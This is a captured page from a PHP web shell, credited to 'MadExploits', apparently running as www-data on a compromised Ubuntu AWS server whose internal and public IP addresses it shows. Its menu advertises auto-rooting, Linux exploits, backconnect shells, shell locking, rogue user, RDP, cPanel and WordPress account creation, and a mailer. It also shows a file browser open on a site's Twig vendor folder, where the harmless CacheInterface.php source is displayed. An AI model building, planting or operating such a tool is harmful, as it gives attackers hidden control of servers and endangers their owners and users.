Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.117.11.129
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz2 /
vendor /
twig /
twig /
src /
Cache /
[ HOME SHELL ]
Name
Size
Permission
Action
CacheInterface.php
1.14
KB
-rw-rw-r--
FilesystemCache.php
2.47
KB
-rw-rw-r--
NullCache.php
690
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CacheInterface.php
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Twig\Cache; /** * Interface implemented by cache classes. * * It is highly recommended to always store templates on the filesystem to * benefit from the PHP opcode cache. This interface is mostly useful if you * need to implement a custom strategy for storing templates on the filesystem. * * @author Andrew Tch <andrew@noop.lv> */ interface CacheInterface { /** * Generates a cache key for the given template class name. */ public function generateKey(string $name, string $className): string; /** * Writes the compiled template to cache. * * @param string $content The template representation as a PHP class */ public function write(string $key, string $content): void; /** * Loads a template from the cache. */ public function load(string $key): void; /** * Returns the modification timestamp of a key. */ public function getTimestamp(string $key): int; }
Close